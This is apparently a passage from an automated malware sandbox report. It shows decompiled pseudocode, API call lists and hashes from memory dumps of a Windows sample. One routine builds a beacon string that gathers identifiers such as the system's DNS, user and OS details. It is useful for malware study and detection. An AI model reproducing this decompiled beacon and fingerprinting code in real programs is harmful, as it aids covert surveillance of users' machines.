                  				signed int _t102;
                  				void* _t104;
                  				long _t108;
                  				signed int _t110;
                  
                  				_t108 = _a4;
                  				_t76 =  *(_t108 + 8);
                  				if((_t76 & 0x00000003) != 0) {
                  					L3:
                  					return 0;
                  				}
                  				_a4 =  *[fs:0x4];
                  				_v8 =  *[fs:0x8];
                  				if(_t76 < _v8 || _t76 >= _a4) {
                  					_t102 =  *(_t108 + 0xc);
                  					__eflags = _t102 - 0xffffffff;
                  					if(_t102 != 0xffffffff) {
                  						_t91 = 0;
                  						__eflags = 0;
                  						_a4 = 0;
                  						_t57 = _t76;
                  						do {
                  							_t80 =  *_t57;
                  							__eflags = _t80 - 0xffffffff;
                  							if(_t80 == 0xffffffff) {
                  								goto L9;
                  							}
                  							__eflags = _t80 - _t91;
                  							if(_t80 >= _t91) {
                  								L20:
                  								_t63 = 0;
                  								L60:
                  								return _t63;
                  							}
                  							L9:
                  							__eflags =  *(_t57 + 4);
                  							if( *(_t57 + 4) != 0) {
                  								_t12 =  &_a4;
                  								 *_t12 = _a4 + 1;
                  								__eflags =  *_t12;
                  							}
                  							_t91 = _t91 + 1;
                  							_t57 = _t57 + 0xc;
                  							__eflags = _t91 - _t102;
                  						} while (_t91 <= _t102);
                  						__eflags = _a4;
                  						if(_a4 == 0) {
                  							L15:
                  							_t81 =  *0xbbd2e0; // 0x0
                  							_t110 = _t76 & 0xfffff000;
                  							_t58 = 0;
                  							__eflags = _t81;
                  							if(_t81 <= 0) {
                  								L18:
                  								_t104 = _t102 | 0xffffffff;
                  								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
                  								__eflags = _t61;
                  								if(_t61 < 0) {
                  									_t62 = 0;
                  									__eflags = 0;
                  								} else {
                  									_t62 = _a4;
                  								}
                  								__eflags = _t62;
                  								if(_t62 == 0) {
                  									L59:
                  									_t63 = _t104;
                  									goto L60;
                  								} else {
                  									__eflags = _v12 - 0x1000000;
                  									if(_v12 != 0x1000000) {
                  										goto L59;
                  									}
                  									__eflags = _v16 & 0x000000cc;
                  									if((_v16 & 0x000000cc) == 0) {
                  										L46:
                  										_t63 = 1;
                  										 *0xbbd328 = 1;
                  										__eflags =  *0xbbd328;
                  										if( *0xbbd328 != 0) {
                  											goto L60;
                  										}
                  										_t84 =  *0xbbd2e0; // 0x0
                  										__eflags = _t84;
                  										_t93 = _t84;
                  										if(_t84 <= 0) {
                  											L51:
                  											__eflags = _t93;
                  											if(_t93 != 0) {
                  												L58:
                  												 *0xbbd328 = 0;
                  												goto L5;
                  											}
                  											_t77 = 0xf;
                  											__eflags = _t84 - _t77;
                  											if(_t84 <= _t77) {
                  												_t77 = _t84;
                  											}
                  											_t94 = 0;
                  											__eflags = _t77;
                  											if(_t77 < 0) {
                  												L56:
                  												__eflags = _t84 - 0x10;
                  												if(_t84 < 0x10) {
                  													_t86 = _t84 + 1;
                  													__eflags = _t86;
                  													 *0xbbd2e0 = _t86;
                  												}
                  												goto L58;
                  											} else {
                  												do {
                  													_t68 = 0xbbd2e8 + _t94 * 4;
                  													_t94 = _t94 + 1;
                  													__eflags = _t94 - _t77;
                  													 *_t68 = _t110;
                  													_t110 =  *_t68;
                  												} while (_t94 <= _t77);
                  												goto L56;
                  											}
                  										}
                  										_t69 = 0xbbd2e4 + _t84 * 4;
                  										while(1) {
                  											__eflags =  *_t69 - _t110;
                  											if( *_t69 == _t110) {
                  												goto L51;
                  											}
                  											_t93 = _t93 - 1;
                  											_t69 = _t69 - 4;
                  											__eflags = _t93;
                  											if(_t93 > 0) {
                  												continue;
                  											}
                  											goto L51;
                  										}
                  										goto L51;
                  									}
                  									_t87 = _v32;
                  									__eflags =  *_t87 - 0x5a4d;
                  									if( *_t87 != 0x5a4d) {
                  										goto L59;
                  									}
                  									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
                  									__eflags =  *_t71 - 0x4550;
                  									if( *_t71 != 0x4550) {
                  										goto L59;
                  									}
                  									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
                  									if( *((short*)(_t71 + 0x18)) != 0x10b) {
                  										goto L59;
                  									}
                  									_t78 = _t76 - _t87;
                  									__eflags =  *((short*)(_t71 + 6));
                  									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
                  									if( *((short*)(_t71 + 6)) <= 0) {
                  										goto L59;
                  									}
                  									_t72 =  *((intOrPtr*)(_t89 + 0xc));
                  									__eflags = _t78 - _t72;
                  									if(_t78 < _t72) {
                  										goto L46;
                  									}
                  									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
                  									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
                  										goto L46;
                  									}
                  									__eflags =  *(_t89 + 0x27) & 0x00000080;
                  									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
                  										goto L20;
                  									}
                  									goto L46;
                  								}
                  							} else {
                  								goto L16;
                  							}
                  							while(1) {
                  								L16:
                  								__eflags =  *((intOrPtr*)(0xbbd2e8 + _t58 * 4)) - _t110;
                  								if( *((intOrPtr*)(0xbbd2e8 + _t58 * 4)) == _t110) {
                  									break;
                  								}
                  								_t58 = _t58 + 1;
                  								__eflags = _t58 - _t81;
                  								if(_t58 < _t81) {
                  									continue;
                  								}
                  								goto L18;
                  							}
                  							__eflags = _t58;
                  							if(_t58 <= 0) {
                  								goto L5;
                  							}
                  							 *0xbbd328 = 1;
                  							__eflags =  *0xbbd328;
                  							if( *0xbbd328 != 0) {
                  								goto L5;
                  							}
                  							__eflags =  *((intOrPtr*)(0xbbd2e8 + _t58 * 4)) - _t110;
                  							if( *((intOrPtr*)(0xbbd2e8 + _t58 * 4)) == _t110) {
                  								L32:
                  								_t100 = 0;
                  								__eflags = _t58;
                  								if(_t58 < 0) {
                  									L34:
                  									 *0xbbd328 = 0;
                  									goto L5;
                  								} else {
                  									goto L33;
                  								}
                  								do {
                  									L33:
                  									_t90 = 0xbbd2e8 + _t100 * 4;
                  									_t100 = _t100 + 1;
                  									__eflags = _t100 - _t58;
                  									 *_t90 = _t110;
                  									_t110 =  *_t90;
                  								} while (_t100 <= _t58);
                  								goto L34;
                  							}
                  							_t25 = _t81 - 1; // -1
                  							_t58 = _t25;
                  							__eflags = _t58;
                  							if(_t58 < 0) {
                  								L28:
                  								__eflags = _t81 - 0x10;
                  								if(_t81 < 0x10) {
                  									_t81 = _t81 + 1;
                  									__eflags = _t81;
                  									 *0xbbd2e0 = _t81;
                  								}
                  								_t28 = _t81 - 1; // 0x0
                  								_t58 = _t28;
                  								goto L32;
                  							} else {
                  								goto L25;
                  							}
                  							while(1) {
                  								L25:
                  								__eflags =  *((intOrPtr*)(0xbbd2e8 + _t58 * 4)) - _t110;
                  								if( *((intOrPtr*)(0xbbd2e8 + _t58 * 4)) == _t110) {
                  									break;
                  								}
                  								_t58 = _t58 - 1;
                  								__eflags = _t58;
                  								if(_t58 >= 0) {
                  									continue;
                  								}
                  								break;
                  							}
                  							__eflags = _t58;
                  							if(__eflags >= 0) {
                  								if(__eflags == 0) {
                  									goto L34;
                  								}
                  								goto L32;
                  							}
                  							goto L28;
                  						}
                  						_t75 =  *((intOrPtr*)(_t108 - 8));
                  						__eflags = _t75 - _v8;
                  						if(_t75 < _v8) {
                  							goto L20;
                  						}
                  						__eflags = _t75 - _t108;
                  						if(_t75 >= _t108) {
                  							goto L20;
                  						}
                  						goto L15;
                  					}
                  					L5:
                  					_t63 = 1;
                  					goto L60;
                  				} else {
                  					goto L3;
                  				}
                  			}

                  APIs
                  • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 00BBB3B2
                  Memory Dump Source
                  • Source File: 00000000.00000002.468762807.0000000000BB1000.00000020.00000001.sdmp, Offset: 00BB0000, based on PE: true
                  • Associated: 00000000.00000002.468748716.0000000000BB0000.00000004.00000001.sdmp
                  • Associated: 00000000.00000002.468850295.0000000000BBC000.00000002.00000001.sdmp
                  • Associated: 00000000.00000002.468892821.0000000000BBD000.00000004.00000001.sdmp
                  • Associated: 00000000.00000002.468934052.0000000000BBF000.00000002.00000001.sdmp
                  Similarity
                  • API ID: MemoryQueryVirtual
                  • String ID:
                  • API String ID: 2850889275-0
                  • Opcode ID: 80b8c0e5174dd27b82b2dd8b21b3bda393d0f9c65f225310dd4fa3f08df71175
                  • Instruction ID: 482ad277423ea2f96337f6e830a8b14f89c5352de48e8247f4e9bc6598bf868f
                  • Opcode Fuzzy Hash: 80b8c0e5174dd27b82b2dd8b21b3bda393d0f9c65f225310dd4fa3f08df71175
                  • Instruction Fuzzy Hash: 546190316006469FDB29CF29C8A0EB973E5FB95314F2885B9D846C7292E7F5DC42CA48
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.473938723.000000006E0D0000.00000020.00020000.sdmp, Offset: 6E0D0000, based on PE: false
                  Similarity
                  • API ID:
                  • String ID: ,
                  • API String ID: 0-3772416878
                  • Opcode ID: b15b6f0ad478087d7346898df292f0c14307cc8149543b582bfe25f923e86340
                  • Instruction ID: 64a37c59388c8770a79777ee26dbea5fcd2dcfaed08a5e098289d8afddae9298
                  • Opcode Fuzzy Hash: b15b6f0ad478087d7346898df292f0c14307cc8149543b582bfe25f923e86340
                  • Instruction Fuzzy Hash: CCF16D74A00904DFCB28DF7CC690A5CBBF2FB8AB04B24C96AD58997354D6309987EF50
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • EnumSystemLocalesW.KERNEL32(Function_00041A2C,00000001), ref: 6E111A6E
                  Memory Dump Source
                  • Source File: 00000000.00000002.473938723.000000006E0D0000.00000020.00020000.sdmp, Offset: 6E0D0000, based on PE: false
                  Similarity
                  • API ID: EnumLocalesSystem
                  • String ID:
                  • API String ID: 2099609381-0
                  • Opcode ID: ed0064fa37d1dbdaa743b107c38bc6ca6faa58b466d5d0531ff0d91c0b9aeb6e
                  • Instruction ID: 6b1486e3a27db0e79af9d29660322f8a265f633edcc663b94cc2dbb807d0b8ce
                  • Opcode Fuzzy Hash: ed0064fa37d1dbdaa743b107c38bc6ca6faa58b466d5d0531ff0d91c0b9aeb6e
                  • Instruction Fuzzy Hash: 2CE04631214608EFDF42DFE0FC09F9A3BA6BB85310F10D410F6188A554C3B1A4A0EF64
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • GetLocaleInfoW.KERNEL32(00000000,?,00000002,?,?,6E10AA6F,?,?,?,00000002,?,00000000,00000000), ref: 6E111AED
                  Memory Dump Source
                  • Source File: 00000000.00000002.473938723.000000006E0D0000.00000020.00020000.sdmp, Offset: 6E0D0000, based on PE: false
                  Similarity
                  • API ID: InfoLocale
                  • String ID:
                  • API String ID: 2299586839-0
                  • Opcode ID: 54ac03ed75f7f3fd128b32ea33fd07413a254e927cf324f684f800f5b096f90c
                  • Instruction ID: 4255f8be799ac4e1cb9ad599de3bf066a3151cf6aaf2dc87376e830dbe0c179c
                  • Opcode Fuzzy Hash: 54ac03ed75f7f3fd128b32ea33fd07413a254e927cf324f684f800f5b096f90c
                  • Instruction Fuzzy Hash: 30D01732004149BF8F01DFE1ED0ACAA3F69FB09324B008801F91885010DA32A460AB61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • SetUnhandledExceptionFilter.KERNEL32(?), ref: 6E111096
                  Memory Dump Source
                  • Source File: 00000000.00000002.473938723.000000006E0D0000.00000020.00020000.sdmp, Offset: 6E0D0000, based on PE: false
                  Similarity
                  • API ID: ExceptionFilterUnhandled
                  • String ID:
                  • API String ID: 3192549508-0
                  • Opcode ID: be258b4b9a096a301e1053c51fcfb1ef559e7e7507d7796f76e3b43f36dd597a
                  • Instruction ID: 5ae327eb10a90696609413dea50d616267d7977f8f56aa0c89eaf3ff69fc7848
                  • Opcode Fuzzy Hash: be258b4b9a096a301e1053c51fcfb1ef559e7e7507d7796f76e3b43f36dd597a
                  • Instruction Fuzzy Hash: 56A0123000010CFBCE111A42DC058487F2CD7011507008010F40C040119B3254505594
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • GetProcessHeap.KERNEL32(6E10A231,6E13B488,00000008,6E10A407,?,00000001,?,6E13B4A8,0000000C,6E10A3A6,?,00000001,?), ref: 6E10B830
                  Memory Dump Source
                  • Source File: 00000000.00000002.473938723.000000006E0D0000.00000020.00020000.sdmp, Offset: 6E0D0000, based on PE: false
                  Similarity
                  • API ID: HeapProcess
                  • String ID:
                  • API String ID: 54951025-0
                  • Opcode ID: 97dc81cf01b42eee5476ae05ff3c2dba343989a16a3c12040d119f8cddd600bb
                  • Instruction ID: a9158cf0ce41e537d4c4379f3abc188219aeaf2e21a1e664bab27617be840290
                  • Opcode Fuzzy Hash: 97dc81cf01b42eee5476ae05ff3c2dba343989a16a3c12040d119f8cddd600bb
                  • Instruction Fuzzy Hash: 3FB012B0302A028B9F099B3D9E2910D35E87B0920230480BD7103CA1C0DF20C450EF04
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 71%
                  			E6E0C2184(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
                  				intOrPtr _v8;
                  				char _v12;
                  				void* __ebp;
                  				signed int* _t43;
                  				char _t44;
                  				void* _t46;
                  				void* _t49;
                  				intOrPtr* _t53;
                  				void* _t54;
                  				void* _t65;
                  				long _t66;
                  				signed int* _t80;
                  				signed int* _t82;
                  				void* _t84;
                  				signed int _t86;
                  				void* _t89;
                  				void* _t95;
                  				void* _t96;
                  				void* _t99;
                  				void* _t106;
                  
                  				_t43 = _t84;
                  				_t65 = __ebx + 2;
                  				 *_t43 =  *_t43 ^ __edx ^  *__eax;
                  				_t89 = _t95;
                  				_t96 = _t95 - 8;
                  				_push(_t65);
                  				_push(_t84);
                  				_push(_t89);
                  				asm("cld");
                  				_t66 = _a8;
                  				_t44 = _a4;
                  				if(( *(_t44 + 4) & 0x00000006) != 0) {
                  					_push(_t89);
                  					E6E0C22EB(_t66 + 0x10, _t66, 0xffffffff);
                  					_t46 = 1;
                  				} else {
                  					_v12 = _t44;
                  					_v8 = _a12;
                  					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
                  					_t86 =  *(_t66 + 0xc);
                  					_t80 =  *(_t66 + 8);
                  					_t49 = E6E0C23A5(_t66);
                  					_t99 = _t96 + 4;
                  					if(_t49 == 0) {
                  						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
                  						goto L11;
                  					} else {
                  						while(_t86 != 0xffffffff) {
                  							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
                  							if(_t53 == 0) {
                  								L8:
                  								_t80 =  *(_t66 + 8);
                  								_t86 = _t80[_t86 + _t86 * 2];
                  								continue;
                  							} else {
                  								_t54 =  *_t53();
                  								_t89 = _t89;
                  								_t86 = _t86;
                  								_t66 = _a8;
                  								_t55 = _t54;
                  								_t106 = _t54;
                  								if(_t106 == 0) {
                  									goto L8;
                  								} else {
                  									if(_t106 < 0) {
                  										_t46 = 0;
                  									} else {
                  										_t82 =  *(_t66 + 8);
                  										E6E0C2290(_t55, _t66);
                  										_t89 = _t66 + 0x10;
                  										E6E0C22EB(_t89, _t66, 0);
                  										_t99 = _t99 + 0xc;
                  										E6E0C2387(_t82[2]);
                  										 *(_t66 + 0xc) =  *_t82;
                  										_t66 = 0;
                  										_t86 = 0;
                  										 *(_t82[2])(1);
                  										goto L8;
                  									}
                  								}
                  							}
                  							goto L13;
                  						}
                  						L11:
                  						_t46 = 1;
                  					}
                  				}
                  				L13:
                  				return _t46;
                  			}
























                  Memory Dump Source
                  • Source File: 00000000.00000002.473873275.000000006E0C1000.00000020.00020000.sdmp, Offset: 6E0C0000, based on PE: true
                  • Associated: 00000000.00000002.473861894.000000006E0C0000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.473885975.000000006E0C3000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.473899226.000000006E0C5000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.473916514.000000006E0C6000.00000002.00020000.sdmp
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
                  • Instruction ID: b6c8464671c10761da099252a234ca5a3faf1723045cf25251906089e80cc087
                  • Opcode Fuzzy Hash: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
                  • Instruction Fuzzy Hash: 4021D672900605AFD700DFA8DC80AAFF7A9FF59750B058468DD598B245DB30FA15CBE1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 71%
                  			E00BBB0DC(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
                  				intOrPtr _v8;
                  				char _v12;
                  				void* __ebp;
                  				signed int* _t43;
                  				char _t44;
                  				void* _t46;
                  				void* _t49;
                  				intOrPtr* _t53;
                  				void* _t54;
                  				void* _t65;
                  				long _t66;
                  				signed int* _t80;
                  				signed int* _t82;
                  				void* _t84;
                  				signed int _t86;
                  				void* _t89;
                  				void* _t95;
                  				void* _t96;
                  				void* _t99;
                  				void* _t106;
                  
                  				_t43 = _t84;
                  				_t65 = __ebx + 2;
                  				 *_t43 =  *_t43 ^ __edx ^  *__eax;
                  				_t89 = _t95;
                  				_t96 = _t95 - 8;
                  				_push(_t65);
                  				_push(_t84);
                  				_push(_t89);
                  				asm("cld");
                  				_t66 = _a8;
                  				_t44 = _a4;
                  				if(( *(_t44 + 4) & 0x00000006) != 0) {
                  					_push(_t89);
                  					E00BBB247(_t66 + 0x10, _t66, 0xffffffff);
                  					_t46 = 1;
                  				} else {
                  					_v12 = _t44;
                  					_v8 = _a12;
                  					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
                  					_t86 =  *(_t66 + 0xc);
                  					_t80 =  *(_t66 + 8);
                  					_t49 = E00BBB301(_t66);
                  					_t99 = _t96 + 4;
                  					if(_t49 == 0) {
                  						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
                  						goto L11;
                  					} else {
                  						while(_t86 != 0xffffffff) {
                  							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
                  							if(_t53 == 0) {
                  								L8:
                  								_t80 =  *(_t66 + 8);
                  								_t86 = _t80[_t86 + _t86 * 2];
                  								continue;
                  							} else {
                  								_t54 =  *_t53();
                  								_t89 = _t89;
                  								_t86 = _t86;
                  								_t66 = _a8;
                  								_t55 = _t54;
                  								_t106 = _t54;
                  								if(_t106 == 0) {
                  									goto L8;
                  								} else {
                  									if(_t106 < 0) {
                  										_t46 = 0;
                  									} else {
                  										_t82 =  *(_t66 + 8);
                  										E00BBB1EC(_t55, _t66);
                  										_t89 = _t66 + 0x10;
                  										E00BBB247(_t89, _t66, 0);
                  										_t99 = _t99 + 0xc;
                  										E00BBB2E3(_t82[2]);
                  										 *(_t66 + 0xc) =  *_t82;
                  										_t66 = 0;
                  										_t86 = 0;
                  										 *(_t82[2])(1);
                  										goto L8;
                  									}
                  								}
                  							}
                  							goto L13;
                  						}
                  						L11:
                  						_t46 = 1;
                  					}
                  				}
                  				L13:
                  				return _t46;
                  			}
























                  Memory Dump Source
                  • Source File: 00000000.00000002.468762807.0000000000BB1000.00000020.00000001.sdmp, Offset: 00BB0000, based on PE: true
                  • Associated: 00000000.00000002.468748716.0000000000BB0000.00000004.00000001.sdmp
                  • Associated: 00000000.00000002.468850295.0000000000BBC000.00000002.00000001.sdmp
                  • Associated: 00000000.00000002.468892821.0000000000BBD000.00000004.00000001.sdmp
                  • Associated: 00000000.00000002.468934052.0000000000BBF000.00000002.00000001.sdmp
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
                  • Instruction ID: ec3a1c1e926618b6fe82a6e20553271d3eda018e79c142e8747b23a8adf4a9d5
                  • Opcode Fuzzy Hash: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
                  • Instruction Fuzzy Hash: 20219072900204ABCB14EF68CC91DBBBBE5FF45350B4681A8E955AB245D7B0FA15CBE0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000000.00000002.474452249.000000006E140000.00000040.00020000.sdmp, Offset: 6E140000, based on PE: false
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
                  • Instruction ID: 59d6805cdd1322230450fab32b81279a372a6666e941fc94409a7b349c142bc8
                  • Opcode Fuzzy Hash: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
                  • Instruction Fuzzy Hash: 35118173340201DFD754CE9ADC91E9673AAEBA9330B258066ED08DB305E676E852D760
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000000.00000002.474452249.000000006E140000.00000040.00020000.sdmp, Offset: 6E140000, based on PE: false
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2c84f22b3cc78628e4c069225da77c858ff700800577a2065164e0eac194b3da
                  • Instruction ID: 14371fdedb563423f4cc4d83bafeffb19a43f83b1f1e6b15f63b3102ad3487e8
                  • Opcode Fuzzy Hash: 2c84f22b3cc78628e4c069225da77c858ff700800577a2065164e0eac194b3da
                  • Instruction Fuzzy Hash: 59012237354202CFD744CB6DD990D6AB7E4EBD1320B39807EC406C7715D220E889C920
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 66%
                  			E00BB5E79(long __eax, void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, void* _a16, void* _a24, intOrPtr _a32) {
                  				intOrPtr _v0;
                  				intOrPtr _v4;
                  				intOrPtr _v16;
                  				intOrPtr _v24;
                  				intOrPtr _v28;
                  				void* _v44;
                  				intOrPtr _v52;
                  				void* __edi;
                  				long _t25;
                  				intOrPtr _t26;
                  				intOrPtr _t27;
                  				intOrPtr _t28;
                  				intOrPtr _t29;
                  				intOrPtr _t30;
                  				void* _t33;
                  				intOrPtr _t34;
                  				int _t37;
                  				intOrPtr _t42;
                  				intOrPtr _t43;
                  				intOrPtr _t50;
                  				intOrPtr _t54;
                  				intOrPtr* _t56;
                  				intOrPtr _t62;
                  				intOrPtr _t68;
                  				intOrPtr _t71;
                  				intOrPtr _t74;
                  				int _t77;
                  				intOrPtr _t78;
                  				int _t81;
                  				intOrPtr _t83;
                  				int _t86;
                  				intOrPtr* _t89;
                  				intOrPtr* _t90;
                  				void* _t91;
                  				void* _t95;
                  				void* _t96;
                  				void* _t97;
                  				intOrPtr _t98;
                  				void* _t100;
                  				int _t101;
                  				void* _t102;
                  				void* _t103;
                  				void* _t105;
                  				void* _t106;
                  				void* _t108;
                  
                  				_t95 = __edx;
                  				_t91 = __ecx;
                  				_t25 = __eax;
                  				_t105 = _a16;
                  				_v4 = 8;
                  				if(__eax == 0) {
                  					_t25 = GetTickCount();
                  				}
                  				_t26 =  *0xbbd018; // 0xd4967592
                  				asm("bswap eax");
                  				_t27 =  *0xbbd014; // 0x3a87c8cd
                  				asm("bswap eax");
                  				_t28 =  *0xbbd010; // 0xd8d2f808
                  				asm("bswap eax");
                  				_t29 =  *0xbbd00c; // 0xeec43f25
                  				asm("bswap eax");
                  				_t30 =  *0xbbd2a4; // 0x2a5a5a8
                  				_t3 = _t30 + 0xbbe633; // 0x74666f73
                  				_t101 = wsprintfA(_t105, _t3, 2, 0x3d153, _t29, _t28, _t27, _t26,  *0xbbd02c,  *0xbbd004, _t25);
                  				_t33 = E00BBA358();
                  				_t34 =  *0xbbd2a4; // 0x2a5a5a8
                  				_t4 = _t34 + 0xbbe673; // 0x74707526
                  				_t37 = wsprintfA(_t101 + _t105, _t4, _t33);
                  				_t108 = _t106 + 0x38;
                  				_t102 = _t101 + _t37;
                  				_t96 = E00BB5369(_t91);
                  				if(_t96 != 0) {
                  					_t83 =  *0xbbd2a4; // 0x2a5a5a8
                  					_t6 = _t83 + 0xbbe8eb; // 0x736e6426
                  					_t86 = wsprintfA(_t102 + _t105, _t6, _t96);
                  					_t108 = _t108 + 0xc;
                  					_t102 = _t102 + _t86;
                  					HeapFree( *0xbbd238, 0, _t96);
                  				}
                  				_t97 = E00BBA0B7();
                  				if(_t97 != 0) {
                  					_t78 =  *0xbbd2a4; // 0x2a5a5a8
                  					_t8 = _t78 + 0xbbe8f3; // 0x6f687726
                  					_t81 = wsprintfA(_t102 + _t105, _t8, _t97);
                  					_t108 = _t108 + 0xc;
                  					_t102 = _t102 + _t81;
                  					HeapFree( *0xbbd238, 0, _t97);
                  				}
                  				_t98 =  *0xbbd32c; // 0x36195b0
                  				_a32 = E00BB3802(0xbbd00a, _t98 + 4);
                  				_t42 =  *0xbbd2cc; // 0x0
                  				if(_t42 != 0) {
                  					_t74 =  *0xbbd2a4; // 0x2a5a5a8
                  					_t11 = _t74 + 0xbbe8cd; // 0x3d736f26
                  					_t77 = wsprintfA(_t102 + _t105, _t11, _t42);
                  					_t108 = _t108 + 0xc;
                  					_t102 = _t102 + _t77;
                  				}
                  				_t43 =  *0xbbd2c8; // 0x0
                  				if(_t43 != 0) {
                  					_t71 =  *0xbbd2a4; // 0x2a5a5a8
                  					_t13 = _t71 + 0xbbe8c6; // 0x3d706926
                  					wsprintfA(_t102 + _t105, _t13, _t43);
                  				}
                  				if(_a32 != 0) {
                  					_t100 = RtlAllocateHeap( *0xbbd238, 0, 0x800);
                  					if(_t100 != 0) {
                  						E00BB10BF(GetTickCount());
                  						_t50 =  *0xbbd32c; // 0x36195b0
                  						__imp__(_t50 + 0x40);
                  						asm("lock xadd [eax], ecx");
                  						_t54 =  *0xbbd32c; // 0x36195b0
                  						__imp__(_t54 + 0x40);
                  						_t56 =  *0xbbd32c; // 0x36195b0
                  						_t103 = E00BB61B9(1, _t95, _t105,  *_t56);
                  						asm("lock xadd [eax], ecx");
                  						if(_t103 != 0) {
                  							StrTrimA(_t103, 0xbbc2ac);
                  							_push(_t103);
                  							_t62 = E00BBA755();
                  							_v16 = _t62;
                  							if(_t62 != 0) {
                  								_t89 = __imp__;
                  								 *_t89(_t103, _v0);
                  								 *_t89(_t100, _a4);
                  								_t90 = __imp__;
                  								 *_t90(_t100, _v28);
                  								 *_t90(_t100, _t103);
                  								_t68 = E00BB1596(0xffffffffffffffff, _t100, _v28, _v24);
                  								_v52 = _t68;
                  								if(_t68 != 0 && _t68 != 0x10d2) {
                  									E00BB14EF();
                  								}
                  								HeapFree( *0xbbd238, 0, _v44);
                  							}
                  							HeapFree( *0xbbd238, 0, _t103);
                  						}
                  						HeapFree( *0xbbd238, 0, _t100);
                  					}
                  					HeapFree( *0xbbd238, 0, _a24);
                  				}
                  				HeapFree( *0xbbd238, 0, _t105);
                  				return _a12;
                  			}

















































                  APIs
                  • GetTickCount.KERNEL32 ref: 00BB5E90
                  • wsprintfA.USER32 ref: 00BB5EDD
                  • wsprintfA.USER32 ref: 00BB5EFA
                  • wsprintfA.USER32 ref: 00BB5F1D
                  • HeapFree.KERNEL32(00000000,00000000), ref: 00BB5F2D
                  • wsprintfA.USER32 ref: 00BB5F4F
                  • HeapFree.KERNEL32(00000000,00000000), ref: 00BB5F5F
                  • wsprintfA.USER32 ref: 00BB5F96
                  • wsprintfA.USER32 ref: 00BB5FB6
                  • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00BB5FD3
                  • GetTickCount.KERNEL32 ref: 00BB5FE3
                  • RtlEnterCriticalSection.NTDLL(03619570), ref: 00BB5FF7
                  • RtlLeaveCriticalSection.NTDLL(03619570), ref: 00BB6015
                    • Part of subcall function 00BB61B9: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,7742C740,?,?,00BB6028,?,036195B0), ref: 00BB61E4
                    • Part of subcall function 00BB61B9: lstrlen.KERNEL32(?,?,?,00BB6028,?,036195B0), ref: 00BB61EC
                    • Part of subcall function 00BB61B9: strcpy.NTDLL ref: 00BB6203
                    • Part of subcall function 00BB61B9: lstrcat.KERNEL32(00000000,?), ref: 00BB620E
                    • Part of subcall function 00BB61B9: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,00BB6028,?,036195B0), ref: 00BB622B
                  • StrTrimA.SHLWAPI(00000000,00BBC2AC,?,036195B0), ref: 00BB6047
                    • Part of subcall function 00BBA755: lstrlen.KERNEL32(03619908,00000000,00000000,7742C740,00BB6053,00000000), ref: 00BBA765
                    • Part of subcall function 00BBA755: lstrlen.KERNEL32(?), ref: 00BBA76D
                    • Part of subcall function 00BBA755: lstrcpy.KERNEL32(00000000,03619908), ref: 00BBA781
                    • Part of subcall function 00BBA755: lstrcat.KERNEL32(00000000,?), ref: 00BBA78C
                  • lstrcpy.KERNEL32(00000000,?), ref: 00BB6066
                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00BB606D
                  • lstrcat.KERNEL32(00000000,?), ref: 00BB607A
                  • lstrcat.KERNEL32(00000000,00000000), ref: 00BB607E
                    • Part of subcall function 00BB1596: WaitForSingleObject.KERNEL32(00000000,00000000,00000000,74B481D0), ref: 00BB1648
                  • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 00BB60AE
                  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00BB60BD
                  • HeapFree.KERNEL32(00000000,00000000,?,036195B0), ref: 00BB60CC
                  • HeapFree.KERNEL32(00000000,00000000), ref: 00BB60DE
                  • HeapFree.KERNEL32(00000000,?), ref: 00BB60ED
